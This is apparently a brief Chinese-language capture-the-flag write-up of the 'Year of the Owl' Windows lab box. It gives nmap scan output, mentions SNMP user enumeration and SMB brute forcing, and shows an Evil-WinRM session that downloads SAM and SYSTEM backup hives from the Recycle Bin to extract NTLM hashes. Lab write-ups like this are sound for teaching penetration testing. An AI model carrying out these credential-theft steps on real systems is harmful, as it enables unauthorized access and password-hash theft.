Year of the Owl

端口扫描

root@ip-10-10-209-67:~/yearoftheowl# nmap -sTCV -p- --min-rate 1000 10.10.142.14

Starting Nmap 7.60 ( https://nmap.org ) at 2023-11-05 06:36 GMT
Nmap scan report for ip-10-10-142-14.eu-west-1.compute.internal (10.10.142.14)
Host is up (0.0079s latency).
Not shown: 65527 filtered ports
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.4.10)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.4.10
|_http-title: Year of the Owl
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp   open  ssl/http      Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.4.10)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.4.10
|_http-title: Year of the Owl
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
445/tcp   open  microsoft-ds?
3306/tcp  open  mysql?
| fingerprint-strings: 
|   NULL: 
|_    Host 'ip-10-10-209-67.eu-west-1.compute.internal' is not allowed to connect to this MariaDB server
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=year-of-the-owl
| Not valid before: 2023-11-04T05:26:38
|_Not valid after:  2024-05-05T05:26:38
|_ssl-date: 2023-11-05T06:39:15+00:00; +1s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.60%I=7%D=11/5%Time=65473886%P=x86_64-pc-linux-gnu%r(NU
SF:LL,69,"e\0\0\x01\xffj\x04Host\x20'ip-10-10-209-67\.eu-west-1\.compute\.
SF:internal'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20Mar
SF:iaDB\x20server");
MAC Address: 02:96:F8:84:EB:33 (Unknown)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-11-05 06:39:16
|_  start_date: 1600-12-31 23:58:45

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 193.78 seconds

snmp

使用 snmp-check 工具可以获取到其中的用户名称

SMB

进行暴力破解

后渗透

Jareth

Jareth —> administrator

上传工具进行扫描之后 发现在回收站存在 sam.bak 文件可以从中获取 NTLM Hash

User Name              SID
====================== =============================================
year-of-the-owl\jareth S-1-5-21-1987495829-1628902820-919763334-1001

*Evil-WinRM* PS C:\$Recycle.bin\S-1-5-21-1987495829-1628902820-919763334-1001> ls

    Directory: C:\$Recycle.bin\S-1-5-21-1987495829-1628902820-919763334-1001

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/18/2020   7:28 PM          49152 sam.bak
-a----        9/18/2020   7:28 PM       17457152 system.bak
*Evil-WinRM* PS C:\$Recycle.bin\S-1-5-21-1987495829-1628902820-919763334-1001> move .\system.bak c:\users\jareth\documents\system.bak
*Evil-WinRM* PS C:\$Recycle.bin\S-1-5-21-1987495829-1628902820-919763334-1001> move .\sam.bak c:\users\jareth\documents\sam.bak 
*Evil-WinRM* PS C:\$Recycle.bin\S-1-5-21-1987495829-1628902820-919763334-1001> download C:\users\jareth\documents\system.bak
*Evil-WinRM* PS C:\$Recycle.bin\S-1-5-21-1987495829-1628902820-919763334-1001> download C:\users\jareth\documents\sam.bak